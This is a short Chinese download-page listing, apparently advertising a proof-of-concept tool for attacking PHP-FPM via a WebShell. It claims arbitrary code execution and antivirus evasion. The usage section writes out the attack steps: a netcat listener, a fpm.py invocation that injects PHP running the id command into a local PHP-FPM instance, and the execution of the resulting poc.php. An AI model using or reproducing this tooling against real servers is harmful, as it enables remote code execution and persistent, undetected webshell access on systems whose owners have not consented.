-
PHP-FPM遭受WebShell攻击时,可能是通过WebShell进行的
资源介绍
用WebShell攻击PHP-FPM
来自大佬的文末一个想法
快速实现了一个poc,可以实现任意代码执行
后续用单文件PHP实现一个FastCgi Client,然后已知PHP文件就用WebShell本身,没有什么骚操作的话WebShell应该就是免杀的
使用
测试php7.3-fpm,在TCP模式和本地socket都可以运行
echo "<?php echo 1; ?>" > /tmp/poc.php
nc -lvp 6666 > payload.txt
python fpm.py -c '<?php echo `id`; exit;?>' -p 6666 127.0.0.1 /tmp/poc.php
运行poc.php
php poc.php
参考
fpm.py来自
- 上一篇: C# 清理 IE 缓存文件.txt
- 下一篇: C#缓存的使用